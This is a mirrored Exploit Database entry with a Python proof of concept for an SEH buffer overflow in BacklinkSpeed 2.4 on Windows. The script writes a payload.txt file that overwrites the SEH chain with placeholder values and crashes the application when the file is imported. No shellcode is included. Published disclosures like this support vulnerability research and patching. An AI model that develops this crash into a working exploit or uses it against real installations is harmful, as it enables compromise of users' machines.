BacklinkSpeed 2.4 – Buffer Overflow PoC (SEH)

• Exploit Database
• 105 阅读

• 作者： Saeed reza Zamanian
  日期： 2020-08-03
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/48726/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47

  # Exploit Title: BacklinkSpeed 2.4 - Buffer Overflow PoC (SEH) # Date: 2020-08-01 # Exploit Author: Saeed reza Zamanian # Vendor Homepage: http://www.dummysoftware.com # Software Link: http://www.dummysoftware.com/backlinkspeed.html # Version: 2.4 # Tested on: Windows 10.0 x64 Build 10240 Windows 7 x64 Windows Vista x32 SP1 # Replicate Crash: 1) Install and Run the application 2) Run the exploit , the exploit create a text file named payload.txt 3) Press import button and open payload.txt   #!/usr/bin/python '''   |----------------------------------| | SEH chain of thread 00000350 | | AddressSE handler | | 42424242 *** CORRUPT ENTRY *** | | | | EIP : 43434343 | |----------------------------------| '''   nSEH = "BBBB" SEH = "CCCC" payload = "A"*5000+nSEH+"\x90\x90\x90\x90\x90\x90\x90\x90"+SEH   try:   f=open("payload.txt","w")   print("[+] Creating %s bytes payload." %len(payload))   f.write(payload)   f.close()   print("[+] File created!")   except:   print("File cannot be created.")